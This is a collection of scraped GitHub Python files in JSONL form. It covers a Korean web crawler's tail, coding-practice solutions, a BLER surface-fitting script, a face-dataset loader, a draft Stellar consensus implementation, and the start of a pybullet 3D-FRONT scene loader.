excel_file.save(dir)\r\n df['btitle'] = btitles\r\n df['brticle'] = brticles\r\n df['brticle2'] = brticles2\r\n df['buth'] = buths\r\n df['btime'] = btimes\r\n df.to_excel('C:/Users/skflc/Desktop/' + ' 0624finS2.xlsx')\r\n\r\n\r\n time.sleep(1)\r\n print(\"액셀파일 생성이완료됨\")\r\n d = input(\"종료하려면 x를 누르세요 : \")\r\n if d == 'x':\r\n break\r\n\r\n except Exception as e:\r\n print(e)\r\n print(traceback.format_exc())\r\n print('예기치 못한 오류가 발생했습니다.')\r\n print('3초뒤 다시 시작합니다')\r\n time.sleep(3)\r\n\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) #경고무시창\r\nrequests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += 'HIGH:!DH:!aNULL'\r\ntry:\r\n requests.packages.urllib3.contrib.pyopenssl.DEFAULT_SSL_CIPHER_LIST += 'HIGH:!DH:!aNULL'\r\nexcept AttributeError:\r\n # no pyopenssl support used / needed / available\r\n pass\r\n\r\n# 일단 복붙은 했는데 도저히 무슨원린지 모르겠다... 이건 verify 문제도 아닌가본데? 참고 : https://stackoverflow.com/questions/38015537/python-requests-exceptions-sslerror-dh-key-too-small\r\n\r\nvoid()\r\n\r\n\r\n# 거의 모든경우 이렇게 진행\r\n# 페이지번호도 따로 읽어야 한다. 페이지의 모든경우를 다읽었을 경우에도 다음페이지로 넘어가는 코드가 있어야한다. 단 번호만으로도 가능한경우엔 상관없다.\r\n# 개별 번호 역시 순차적으로 되지 않기 때문에 200인 경우에만 시도하도록 짜야한다.\r\n# if 200 = append 글내용 else = append error 404\r\n# 0624 내용자체는 문제가 없는데 자꾸 오류가 나는걸 보아 pyxl.append에서 문제가 나는것 같은데...\r\n# 파이엑셀로 저장하던걸 pandas로 액셀저장하도록 한 버전 pyexcel append가 어째서인지 짤림","repo_name":"kimjunghyun2/mystreamlit","sub_path":"0624crawiling.py","file_name":"0624crawiling.py","file_ext":"py","file_size_in_byte":8156,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"47172598580","text":"# Given a string s consisting of small English letters, find and return the first instance of a non-repeating character in it. If there is no such character, return '_'.\n\n# Example\n\n# For s = \"abacabad\", the output should be\n# first_not_repeating_character(s) = 'c'.\n\n# There are 2 non-repeating characters in the string: 'c' and 'd'. Return c since it appears in the string first.\n\n# For s = \"abacabaabacaba\", the output should be\n# first_not_repeating_character(s) = '_'.\n\n# There are no characters in this string that do not repeat.\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] string s\n\n# A string that contains only lowercase English letters.\n\n# [output] char\n\n# The first non-repeating character in s of '_' if there are no characters that do not repeat.\nfrom collections import Counter\ndef first_not_repeating_character(s):\n# use a set for unique characters\n# or use a count of each character. if only 1 return character\n# else return \"_\"\n count = Counter(s)\n returnchar = \"\"\n boolean = False\n for num in count:\n if count[num] == 1:\n returnchar += num\n boolean = True\n break\n if boolean == False:\n returnchar = \"_\"\n return returnchar","repo_name":"jordan-hanson/codesignal-practice","sub_path":"Python/firstnotrepeatingcharacter.py","file_name":"firstnotrepeatingcharacter.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20724454115","text":"# you can write to stdout for debugging purposes, e.g.\n# print(\"this is a debug message\")\n\ndef solution(A):\n # write your code in Python 3.8.10\n num = {}\n for i in range(len(A)):\n if A[i] in num:\n num[A[i]] += 1\n else:\n num[A[i]] = 1\n\n for elemt in num:\n if num[elemt] % 2 != 0:\n return elemt","repo_name":"Angela-OH/Algorithm","sub_path":"codility/lesson2_2.py","file_name":"lesson2_2.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"43346014501","text":"\"\"\"\nIncluded here: Day 10 of 30 Days to Code.\nSee the Jupyter Notebook for more notes related to this tutorial.\n\"\"\"\n\n#func that converts decimal to binary, returns string of bits, only works for <= 16-bit numbers\ndef Decimal2Binary(num): \n def innerAlg(num):\n #base case\n if num == 1: #last step has a dividend of 1\n return str(num % 2) #last steps bit is the left-most bit overall\n #recursive case\n remain = num % 2 #becomes bit for this step of the conversion\n #integer division here to get the dividend for the next step\n dividend = num // 2 #becomes dividend of next step, divisor of 2 always\n return str(innerAlg(dividend)) + str(remain) #bit from first step is the right-most bit\n\n #this function combines the output from before with leading zeros to represent the binary \n #number as a 16-bit or 2-byte number\n def innerFormat(string):\n bits = len(string) #number of bits from conversion to binary\n count = 16 - bits #finding number of needed leading zeros\n leadingZero = count * '0' #creating string to horizontally cat to binary number\n return leadingZero + string #returning the 16-bit number\n str1 = innerAlg(num) #calling the conversion scripts\n return innerFormat(str1) #returning the converted number, in binary, as a string\n \nDecimalNumber = 55 #number to convert to binary \nprint(f'{DecimalNumber} as a 16-bit binary number is:',Decimal2Binary(DecimalNumber))\n\n#Part of the Day 10 Coding Challenge, supposed to convert number then provide \n#the largest grouping of consecutive bits that are equal to 1\nBinStr = Decimal2Binary(DecimalNumber)\nBinaryNumber = BinStr\nBinStr = BinStr.split('0') #splits up the string at the zeros, reults in the groupings of 1's and empty elements\n#where the zeros once were\n\n#iterate through the string array, take only the elements that are not empty, find the length of each element,\n#find the element with the largest length, return that as the largest grouping of consecutive ones in the binary number.\nBinCount = max([len(num) for num in BinStr if num != ''])\nprint(f'The largest grouping of consecutive ones in the binary representation of {DecimalNumber} is:',BinCount)\n\ndef Binary2Decimal(num):\n #base cases\n if len(num) == 1 and num == str(1): #if the right most bit is 1, raise it tot he zero power\n return 2**0\n if len(num) == 1 and num != str(1): #if the right most bit is zero, pass back a zero for the summation of converted bits\n return 0\n\n #recursive cases\n bitlen = len(num) - 1 #get the exponent of the 2 for this bit\n current_bit = num[0] #keep the current bit to see if it'll become 0 or 2 raised to the exponent \n num = num[1::] #only pass the following right bits to the next step of the recursion\n if current_bit == str(1): #if the current bit is one, raise it to the exponent and got to the next recursion step\n return int(Binary2Decimal(num)) + 2**bitlen\n return int(Binary2Decimal(num)) + 0 #if the current bit is zero, make the conversion 0 and go to the next step of recursion \n\nprint(f'The binary number {BinaryNumber} represented in decimal is:',Binary2Decimal(BinaryNumber))","repo_name":"freddydrew/HackerRank","sub_path":"30DaysToCode/HowToBinaryPractice.py","file_name":"HowToBinaryPractice.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"3223981331","text":"import warnings\nwarnings.filterwarnings('ignore')\n\nimport json, os, re, scipy\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nimport matplotlib.colors as mcolors\nimport pandas as pd\nfrom matplotlib.backends.backend_pdf import PdfPages\nimport seaborn as sns\nfrom fitter import Fitter, get_common_distributions, get_distributions\n\n\n\n# This finds our json files\nprint(\"This finds our json files\")\nloop = True\nwhile loop:\n# path_to_json = str(input(\"Directory of Json files (which should starts and ends with /): \"))\n path_to_json = './results/'\n # Store the in List called: json_files\n try:\n # Store the in List called: json_files\n json_files = [pos_json for pos_json in os.listdir(path_to_json) if pos_json.endswith('.json')]\n except:\n # if path is empty will get Error\n print(\"Error\")\n\n if len(json_files) != 0:\n loop = False\n\n\n# Here I define a list to store each json file as a DataFrame in a list\njson_list = list()\n\n# we need both the json and an index number so use enumerate()\nfor index,js in enumerate(json_files):\n with open(os.path.join(path_to_json, js)) as json_file:\n # Finding the location of gNodeB\n g_loc = re.findall('[x-y-p][\\d]{1,100}',js)\n\n # Loading Json\n json_text = json.load(json_file,parse_float=True)\n\n # Create DataFrame\n j_pd = pd.DataFrame.from_dict(json_text.items(),dtype=float)\n j_pd.columns = ['Location','BLER'+str(' in ')+str(g_loc[0])+str('-')+str(g_loc[1])+str('-')+str(g_loc[2])]\n\n # For taking locations as a seperate DF\n if index == 0:\n # Append seperatly\n json_list.append(j_pd[['Location']])\n json_list.append(j_pd[['BLER'+str(' in ')+str(g_loc[0])+str('-')+str(g_loc[1])+str('-')+str(g_loc[2])]])\n else :\n # for rest of indexes except '0'\n json_list.append(j_pd[['BLER'+str(' in ')+str(g_loc[0])+str('-')+str(g_loc[1])+str('-')+str(g_loc[2])]])\n\n# Example of js\n# bs_uc3_ls50_ws50_x75_y50_n5000_p100.json\n\n\n# In this part we make our final DataFrame\n\n# combine DataFrames Except Location\nfinal = json_list[1]\nfor i in range(2,len(json_list)):\n final = pd.concat([final, json_list[i]], axis=1)\n\n#-----------------------------------------------\n# human sorting (also known as natural sorting):\ndef atoi(text):\n return int(text) if text.isdigit() else text\n\ndef natural_keys(text):\n '''\n alist.sort(key=natural_keys) sorts in human order\n http://nedbatchelder.com/blog/200712/human_sorting.html\n (See Toothy's implementation in the comments)\n '''\n return [ atoi(c) for c in re.split(r'(\\d+)', text) ]\n#-----------------------------------------------\n\n# sort the columns by using human sorting\nfinal = final.reindex(sorted(final.columns, key=natural_keys), axis=1)\n\n# Add Location DataFrame to the final DataFrame\nfinal = pd.concat([json_list[0], final], axis=1)\n\n# Convert Location of UE to Numpy Array\nUE_Loc = np.zeros([2500,2])\nfor i in range(len(final['Location'])):\n d = re.findall('[\\d]{0,100}',final['Location'][i])\n UE_Loc[i] = [int(d[0])/2,int(d[4])/2]\n\n# Create DataFrame of the UE Location\nlocdf=pd.DataFrame(UE_Loc,columns=['X','Y'])\n\n# Add locatio DataFrame to the Main DataFrame\nfinal = pd.concat([locdf, final], axis=1)\ndel final['Location']\n\n# Convert Location of gNodeB to Numpy Array\ngNodeB_Loc = np.zeros([int((len(final.columns)-2)/4),2])\nfor i in range(0,len(gNodeB_Loc)):\n d = re.findall('[\\d]{2,3}',final.columns[i*4+2])\n gNodeB_Loc[i] = [int(d[0])/2,int(d[1])/2]\n\nprint(final.head())\nprint(final[final.columns[2:]].describe())\n\n## Defining the Colors for ploting\n# Colors which will be used in plots\ncolors = ['tab:red', 'tab:blue', 'tab:green', 'tab:pink', 'tab:olive', 'tab:gray', 'tab:brown', 'tab:orange', 'tab:purple']\n\nsort_colors = True\nif sort_colors is True:\n by_hsv = sorted((tuple(mcolors.rgb_to_hsv(mcolors.to_rgb(color))),name) for name, color in mcolors.CSS4_COLORS.items())\n names = [name for hsv, name in by_hsv]\nelse:\n names = list(colors)\n\n\n# 3D contour plot lines\nnumberOfContourLines = 16\ngraphWidth = 800 # units are pixels\ngraphHeight = 600 # units are pixels\n\n\n## Class for finding the fit of the data and ploting the results\nclass fit_func:\n '''\n this class in put is the Data and the A0\n Dataset name\n Data is the x,y,z\n A0 is the location of the gNodeB of the data which is ploting\n '''\n def __init__(self,dataset_name,data,A0):\n self.dataset_name = dataset_name\n self.data = data\n self.A0 = A0\n\n def dist_plot(self, dataset_name):\n '''\n this def will get the data and plots the distribution and\n find the best fit for the data distribution to get the sigma and\n the mean of the data\n '''\n # sns.set_style('white')\n # sns.set_context(\"paper\", font_scale = 2)\n # sns.displot(data=final[[dataset_name]], kind=\"hist\", bins = 1000, aspect = 1.5)\n\n BLER = final[[dataset_name]].values\n f = Fitter(BLER,distributions=['gamma','lognorm',\"beta\",\"burr\",\"norm\"])\n\n f.fit()\n print(f.summary())\n best_fit = f.get_best(method = 'sumsquare_error')\n # key = best_fit.keys()\n # key, value = best_fit.items()\n if best_fit.keys() == 'lognorm':\n for key, value in best_fit.items():\n print(\"best fit is {}\".format(key))\n for k, v in value.items():\n if k == 's':\n s = v\n if k == 'loc':\n loc = v\n if k == 'scale':\n scale = v\n sigma = s\n mean_1 = scipy.stats.lognorm.mean(s, loc=loc, scale=scale)\n print(\"\\n Best Fit on distribution: {} | sigma: {} | mean: {} \".format(best_fit, sigma, mean_1))\n\n def ScatterPlot(self,data):\n '''\n this def will plots the scatter plot of the Data\n '''\n f = plt.figure(figsize=(graphWidth/100.0, graphHeight/100.0), dpi=100)\n\n plt.grid(True)\n axes = Axes3D(f)\n x_data = data[0]\n y_data = data[1]\n z_data = data[2]\n\n axes.scatter(x_data, y_data, z_data)\n axes.set_title('Scatter Plot for {} Data'.format(self.dataset_name))\n axes.set_xlabel('X Data')\n axes.set_ylabel('Y Data')\n axes.set_zlabel('BLER Data')\n\n plt.show()\n plt.close('all') # clean up after using pyplot or else thaere can be memory and process problems\n\n\n\n def SurfacePlot(self,func, data,fittedParameters):\n '''\n this def will plots the data and the surface fit\n '''\n f = plt.figure(figsize=(graphWidth/100.0, graphHeight/100.0), dpi=100)\n plt.grid(True)\n axes = Axes3D(f)\n\n # Data of the plot\n x_data = data[0]\n y_data = data[1]\n z_data = data[2]\n\n # defining the X and Y amd the Z of plot\n xModel = np.linspace(min(x_data), max(x_data), int(np.sqrt(len(x_data))))\n yModel = np.linspace(min(y_data), max(y_data), int(np.sqrt(len(y_data))))\n X, Y = np.meshgrid(xModel, yModel)\n # Z = func(numpy.array([X, Y]), *fittedParameters)\n Z = self.func([data[0], data[1]], *fittedParameters)\n Z = Z.reshape(len(xModel),len(yModel))\n\n axes.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cm.coolwarm, linewidth=1, antialiased=True)\n\n axes.scatter(x_data, y_data, z_data) # show data along with plotted surface\n\n axes.set_title('Surface Plot for {} Data and the Fit Surface'.format(self.dataset_name)) # add a title for surface plot\n axes.set_xlabel('X Data') # X axis data label\n axes.set_ylabel('Y Data') # Y axis data label\n axes.set_zlabel('BLER') # Z axis data label\n\n plt.show()\n plt.close('all') # clean up after using pyplot or else thaere can be memory and process problems\n\n def ContourPlot(self,func, data, fittedParameters):\n '''\n this def will plot the counter plot of the data to have\n the sight of BLER zones\n '''\n f = plt.figure(figsize=(graphWidth/100.0, graphHeight/100.0), dpi=100)\n axes = f.add_subplot(111)\n\n x_data = data[0]\n y_data = data[1]\n z_data = data[2]\n\n xModel = np.linspace(min(x_data), max(x_data), int(np.sqrt(len(x_data))))\n yModel = np.linspace(min(y_data), max(y_data), int(np.sqrt(len(y_data))))\n X, Y = np.meshgrid(xModel, yModel)\n\n # Z = func(numpy.array([X, Y]), *fittedParameters)\n Z = self.func([data[0], data[1]], *fittedParameters)\n Z = Z.reshape(len(xModel),len(yModel))\n\n axes.plot(x_data, y_data, 'o')\n\n axes.set_title('Contour Plot for {} Data and shows the zone of BLERs'.format(self.dataset_name)) # add a title for contour plot\n axes.set_xlabel('X Data') # X axis data label\n axes.set_ylabel('Y Data') # Y axis data label\n\n CS = plt.contour(X, Y, Z, numberOfContourLines, colors='k')\n plt.clabel(CS, inline=1, fontsize=10) # labels for contours\n\n plt.show()\n plt.close('all') # clean up after using pyplot or else thaere can be memory and process problems\n\n def func(self,data, alpha, beta,a ,b):\n x1 = data[0]\n y1 = data[1]\n # A0 = data[2]\n ## 2D\n x = np.linspace(min(x1), max(x1), int(np.sqrt(len(x1))))\n y = np.linspace(min(y1), max(y1), int(np.sqrt(len(y1))))\n X , Y = np.meshgrid(x,y)\n Z = alpha * (((X-A0[0]+a)**2)) + beta*((Y-A0[1]+b)**2)\n return Z.ravel()\n\n\n def fit_c(self):\n '''\n this the is using ...\n for fit...\n boundaries ...\n method ...\n maxfev ...\n x_scale and f f_scale ...\n telorance ...\n loss ...\n function ...\n '''\n x,y = self.data[0],self.data[1]\n\n # defining fitting Function\n\n loop = True\n while loop:\n\n # getting mean and sigma of data\n self.dist_plot(self.dataset_name)\n\n initialParameters = [.0001, .0001, 0 , 6]\n # here a non-linear surface fit is made with scipy's curve_fit()\n tol = 10**-15\n fittedParameters, pcov = scipy.optimize.curve_fit(self.func, [x,y], z, bounds=([ 0, 0, -10, -10], [ .001, .001, 10, 10]),method='trf',\n p0 = initialParameters,maxfev=10000,ftol=tol, xtol=tol, gtol=tol,\n x_scale=0.1, loss='cauchy', f_scale=0.1, diff_step=None, verbose = 2)\n # ,sigma = 2.520656362227073/zData,absolute_sigma=False,maxfev=1000\n # sigma has been taken from fitter library and the fit was lognoraml\n # scipy.optimize.minimize()\n\n print('fitted prameters', fittedParameters)\n modelPredictions = self.func(data, *fittedParameters)\n absError = modelPredictions - z\n\n SE = np.square(absError) # squared errors\n MSE = np.mean(SE) # mean squared errors\n RMSE = np.sqrt(MSE) # Root Mean Squared Error, RMSE\n Rsquared = 1.0 - (np.var(absError) / np.var(z))\n\n # Condition for stopping the loop\n if (RMSE == RMSE and Rsquared == Rsquared):\n loop = False\n # ploting\n # ScatterPlot(data)\n print('RMSE:', RMSE)\n print('R-squared:', Rsquared)\n self.SurfacePlot(self.func, data,fittedParameters)\n self.ContourPlot(self.func, data, fittedParameters)\n return Rsquared,RMSE,fittedParameters\n\n\nif __name__ == \"__main__\":\n # Defining Data\n x = np.array(final['X'])\n y = np.array(final['Y'])\n RR_list = list()\n\n # this loops will only consider the p = 50\n for i in range(2,len(final.columns),4):\n # A0 is the location of the gNodeB for the exact data\n A0 = gNodeB_Loc[int(abs(i/4)),:]\n\n print(\"\\n calculating fit for gNodeB location: {} and data: {} \".format(A0,final.columns[i]))\n\n z = np.array(final[final.columns[i]])\n data = [x, y, z]\n\n\n # defining model\n model = fit_func(final.columns[i],data,A0)\n\n # Taking the RMSE and the Rsquared\n Rsquared,RMSE,fittedParameters = model.fit_c()\n\n # saving data in the RR_list\n RR_list.append([final.columns[i],Rsquared,RMSE,fittedParameters])\n","repo_name":"alivara/curve_fitting","sub_path":"Surface Fit/surface_fit.py","file_name":"surface_fit.py","file_ext":"py","file_size_in_byte":12568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2404749716","text":"\"\"\"Functions for reading youtube face data.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom PIL import Image, ImageDraw\nimport numpy as np\nimport math\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\n\nrootDir = 'C:\\\\frame_images_DB\\\\frame_images_DB'\nIMAGE_SIZE = 160\n\ndef resize_image(image):\n\tshape = image.size\n\theight = IMAGE_SIZE\n\twidth = IMAGE_SIZE\n\tif shape[0] >= shape[1]:\n\t\theight = math.floor(shape[1] * IMAGE_SIZE / shape[0])\n\telse:\n\t\twidth = math.floor(shape[0] * IMAGE_SIZE / shape[1])\n\tstart_y = math.floor((IMAGE_SIZE - height) / 2)\n\tstart_x = math.floor((IMAGE_SIZE - width) / 2)\n\toutput = np.zeros([IMAGE_SIZE, IMAGE_SIZE, 3])\n\toutput[start_y : start_y + height, start_x : start_x + width, :] = np.array(image.resize((width, height), Image.BILINEAR))\n\treturn output\n\ndef make_box(x, y, size, image):\n\tshape = image.size\n\theight = IMAGE_SIZE\n\twidth = IMAGE_SIZE\n\tratio = 0\n\tif shape[0] >= shape[1]:\n\t\theight = math.floor(shape[1] * IMAGE_SIZE / shape[0])\n\t\tratio = IMAGE_SIZE / shape[0]\n\telse:\n\t\twidth = math.floor(shape[0] * IMAGE_SIZE / shape[1])\n\t\tratio = IMAGE_SIZE / shape[1]\n\tstart_y = math.floor((IMAGE_SIZE - height) / 2)\n\tstart_x = math.floor((IMAGE_SIZE - width) / 2)\n\treturn [(x - size/2) * ratio + start_x, (x + size/2) * ratio + start_x, (y - size/2) * ratio + start_y, (y + size/2) * ratio + start_y]\n\nclass DataSet(object):\n\n\tdef __init__(self, filelist):\n\t\tfo = open(filelist, 'r')\n\t\tself._lines = fo.readlines()\n\t\tself._num_examples = len(self._lines)\n\t\tself._iter = 0\n\n\tdef _load_image(self, index):\n\t\tparts = self._lines[index].split(',')\n\t\timage = Image.open(rootDir + '\\\\' + parts[0])\n\t\tresized_image = resize_image(image).reshape([1, IMAGE_SIZE, IMAGE_SIZE, 3])\n\t\tbox = np.array(make_box(float(parts[1]), float(parts[2]), float(parts[3]), image))\n\t\timage.close()\n\t\treturn resized_image, box\n\n\tdef next_batch(self, size):\n\t\tdata = np.zeros([size, IMAGE_SIZE, IMAGE_SIZE, 3])\n\t\ttruth = np.zeros([size, 4])\n\t\tfor i in xrange(size):\n\t\t\tdata[i, :, :, :], truth[i, :] = self._load_image(self._iter)\n\t\t\tself._iter = (self._iter + 13) % self._num_examples\n\t\treturn data, truth\n\n\t@property\n\tdef num_examples(self):\n\t\treturn self._num_examples\n","repo_name":"VoidSolitary/youtube_face","sub_path":"input_data.py","file_name":"input_data.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"5575770232","text":"class SCPNode:\n class State:\n INIT = 0\n PREPARED = 1\n COMMITTED = 2\n EXTERNALIZED = 3\n \n def __init__(self, node_id, threshold=1):\n self.node_id = node_id\n self.state = SCPNode.State.INIT\n self.ballot_protocol = None\n self.value_to_ballot = {}\n self.threshold = threshold\n self.validators = set()\n self.quorum_slices = []\n\n def add_vote(self, slot_index, value):\n if slot_index not in self.nomination_protocol_state:\n self.nomination_protocol_state[slot_index] = {'votes': set(), 'accepted': set()}\n self.nomination_protocol_state[slot_index]['votes'].add(value)\n\n def add_validator_set(self, validators):\n \"\"\"\n Add a set of validators as a quorum slice.\n\n :param validators: A list of SCPNode instances.\n \"\"\"\n if len(validators) >= self.threshold:\n self.quorum_slices.append(set(validators))\n\n def nominate(self, slot_index, value):\n self.add_vote(slot_index, value)\n message = SCPMessage(\n message_type='nominate',\n sender=self.node_id,\n slot_index=slot_index,\n quorum_slice=self.quorum_slices[0],\n value=value\n )\n return message\n\n def receive_message(self, message):\n if message.message_type == 'nominate':\n self.process_nomination_protocol(message)\n elif message.message_type == 'ballot':\n self.process_ballot_protocol(message)\n\n def process_nomination_protocol(self, message):\n slot_index = message.slot_index\n value = message.value\n quorum_slice = message.quorum_slice\n\n self.add_vote(slot_index, value)\n\n # Check if the value is accepted by a quorum slice\n if self.node_id in quorum_slice.validator_set and self.is_accepted_by_quorum_slice(slot_index, value, quorum_slice):\n self.nomination_protocol_state[slot_index]['accepted'].add(value)\n\n # Broadcast a new nomination message if the value is not already accepted by the node\n if value not in self.nomination_protocol_state[slot_index]['accepted']:\n new_message = SCPMessage(\n message_type='nominate',\n sender=self.node_id,\n slot_index=slot_index,\n quorum_slice=self.quorum_slices[0],\n value=value\n )\n return new_message\n\n def process_ballot_protocol(self, message):\n slot_index = message.slot_index\n ballot = message.ballot\n quorum_slice = message.quorum_slice\n ballot_state = self.ballot_protocol_state.get(slot_index)\n\n if not ballot_state:\n # Initialize the ballot state for this slot index\n self.ballot_protocol_state[slot_index] = {\n 'current_ballot': None,\n 'preparing': None,\n 'prepared': None,\n 'committing': None,\n 'committed': None,\n 'externalized': None\n }\n ballot_state = self.ballot_protocol_state[slot_index]\n\n if message.message_type == 'prepare':\n self.process_prepare(ballot_state, message, quorum_slice)\n\n elif message.message_type == 'commit':\n self.process_commit(ballot_state, message, quorum_slice)\n\n elif message.message_type == 'externalize':\n self.process_externalize(ballot_state, message, quorum_slice)\n\n def process_prepare(self, ballot_state, message, quorum_slice):\n # Implementation of the prepare sub-protocol\n pass\n\n def process_commit(self, ballot_state, message, quorum_slice):\n # Implementation of the commit sub-protocol\n pass\n\n def process_externalize(self, ballot_state, message, quorum_slice):\n # Implementation of the externalize sub-protocol\n pass\n\n def is_accepted_by_quorum_slice(self, slot_index, value, quorum_slice):\n count = 0\n for node in quorum_slice.validator_set:\n if node == self.node_id:\n continue\n if node.nomination_protocol_state.get(slot_index, {}).get('votes', None) and value in node.nomination_protocol_state[slot_index]['votes']:\n count += 1\n if count >= quorum_slice.threshold:\n return True\n return False\n\nclass QuorumSlice:\n def __init__(self, threshold, validator_set):\n self.threshold = threshold\n self.validator_set = validator_set\n\n def contains(self, node_id):\n return node_id in self.validator_set\n\n def is_quorum(self, node_set):\n count = 0\n for node in self.validator_set:\n if node.node_id in node_set:\n count += 1\n if count >= self.threshold:\n return True\n return False\n\nclass SCPMessage:\n def __init__(self, message_type, sender, slot_index, quorum_slice, value=None, ballot=None):\n self.message_type = message_type\n self.sender = sender\n self.slot_index = slot_index\n self.quorum_slice = quorum_slice\n self.value = value\n self.ballot = ballot\n\n def to_dict(self):\n message_dict = {\n 'message_type': self.message_type,\n 'sender': self.sender,\n 'slot_index': self.slot_index,\n 'quorum_slice': {\n 'threshold': self.quorum_slice.threshold,\n 'validator_set': [node.node_id for node in self.quorum_slice.validator_set]\n }\n }\n if self.value is not None:\n message_dict['value'] = self.value\n if self.ballot is not None:\n message_dict['ballot'] = {\n 'counter': self.ballot.counter,\n 'value': self.ballot.value\n }\n return message_dict\n\n @classmethod\n def from_dict(cls, message_dict, nodes):\n quorum_slice_dict = message_dict['quorum_slice']\n quorum_slice = QuorumSlice(\n threshold=quorum_slice_dict['threshold'],\n validator_set=[nodes[node_id] for node_id in quorum_slice_dict['validator_set']]\n )\n ballot_dict = message_dict.get('ballot')\n ballot = None\n if ballot_dict:\n ballot = SCPBallot(\n counter=ballot_dict['counter'],\n value=ballot_dict['value']\n )\n return cls(\n message_type=message_dict['message_type'],\n sender=message_dict['sender'],\n slot_index=message_dict['slot_index'],\n quorum_slice=quorum_slice,\n value=message_dict.get('value'),\n ballot=ballot\n )\n\nclass SCPBallot:\n def __init__(self, counter, value):\n self.counter = counter\n self.value = value\n\n def __eq__(self, other):\n if not isinstance(other, SCPBallot):\n return False\n return self.counter == other.counter and self.value == other.value\n\n def __lt__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n if self.counter < other.counter:\n return True\n if self.counter == other.counter:\n return self.value < other.value\n return False\n\n def __le__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n return self == other or self < other\n\n def __gt__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n return not self <= other\n\n def __ge__(self, other):\n if not isinstance(other, SCPBallot):\n return NotImplemented\n return self == other or self > other\n\n def __repr__(self):\n return f\"SCPBallot(counter={self.counter}, value={self.value})\"\n","repo_name":"jzhao49/BlockchainsS23FinalProject","sub_path":"scp.py","file_name":"scp.py","file_ext":"py","file_size_in_byte":7793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"27256331045","text":"#!/usr/bin/env python3\n\nimport os\nimport random\nimport json\nimport numpy as np\nimport time\nimport logging\nfrom typing import List\n\nfrom pathlib import Path\nimport pybullet as pb\nfrom dataclasses import dataclass\n\nfrom imm.sim.env.env_base import EnvironmentBase\nfrom imm.sim.sim_debug_utils import debug_get_full_aabb\n\n\ndef _ceildiv(a, b):\n \"\"\" from https://stackoverflow.com/a/17511341 \"\"\"\n return -(-a // b)\n\n\ndef _split_multibody_kwargs(kwargs: dict) -> List[dict]:\n \"\"\"\n Split kwargs for createMultiBody, so that\n the number of links do not exceed the hardcoded #128 limit.\n\n NOTE(ycho): This is a hack - consider alternative solutions.\n \"\"\"\n\n num_links = len(kwargs['linkMasses'])\n num_bodies = _ceildiv(num_links, 128)\n\n # NOTE(ycho): Still return as a list even\n # in a trivial case.\n if num_bodies <= 1:\n return [kwargs]\n m = num_links // num_bodies\n\n out = [None for _ in range(num_bodies)]\n for i in range(num_bodies):\n # link slice range ...\n i0 = i * m\n i1 = min((i+1)*m, num_links)\n\n # Start from a copy of `kwargs`.\n out[i] = dict(kwargs)\n\n # Reset properties that should be unique to\n # a single base.\n # NOTE(ycho): This does not pedantically clear ALL properties -\n # only the ones that are known to be set at creation.\n out[i]['baseCollisionShapeIndex'] = -1\n out[i]['baseVisualShapeIndex'] = -1\n\n # Set a slice of link properties.\n for k, v in kwargs.items():\n if k.startswith('link'):\n out[i][k] = v[i0:i1]\n\n # Move base-unique properties into the first element in the split args.\n out[0]['baseCollisionShapeIndex'] = kwargs['baseCollisionShapeIndex']\n out[0]['baseVisualShapeIndex'] = kwargs['baseVisualShapeIndex']\n\n return out\n\n\ndef _load_tdf_scene(scene_file: str, model_dir: str, sim_id: int,\n use_convex_collision: bool):\n \"\"\"\n Load a 3DFRONT scene.\n \"\"\"\n model_dir = Path(model_dir)\n\n data = None\n with open(scene_file, 'r', encoding='utf-8') as f:\n data = json.load(f)\n if data is None:\n return None\n\n # Build mapping from uid <-> jid\n model_uid = []\n model_jid = []\n model_map = dict()\n for f in data['furniture']:\n if 'valid' in f and f['valid']:\n model_map[f['uid']] = f['jid']\n\n # Build mapping from uid <-> mesh = { vertices, face_indices }\n mesh_map = dict()\n for m in data['mesh']:\n mesh_map[m['uid']] = (\n np.reshape(m['xyz'], (-1, 3)).astype(np.float32),\n np.reshape(m['faces'], (-1, 3))\n )\n\n # NOTE(ycho): Special handling for `floor` for facilitating free space sampling.\n # TODO(ycho): Remove this workaround after PR#3238 in the remote is merged.\n floor_set = set()\n for m in data['mesh']:\n if m['type'].strip() == 'Floor':\n floor_set.add(m['uid'])\n\n # Iterate through and add shapes . . .\n scene = data['scene']\n room = scene['room']\n shape_map = dict()\n kwargs = {\n 'baseMass': 0, # fixed,\n 'baseCollisionShapeIndex': -1,\n 'baseVisualShapeIndex': -1,\n 'basePosition': [0, 0, 0],\n # NOTE(ycho): +Y up convention -> +Z up convention\n 'baseOrientation': pb.getQuaternionFromEuler([np.pi/2, 0, 0]),\n 'baseInertialFramePosition': [0, 0, 0],\n 'baseInertialFrameOrientation': [0, 0, 0, 1],\n\n 'linkMasses': [],\n 'linkCollisionShapeIndices': [],\n 'linkVisualShapeIndices': [],\n 'linkPositions': [],\n 'linkOrientations': [],\n 'linkInertialFramePositions': [],\n 'linkInertialFrameOrientations': [],\n 'linkParentIndices': [],\n 'linkJointTypes': [],\n 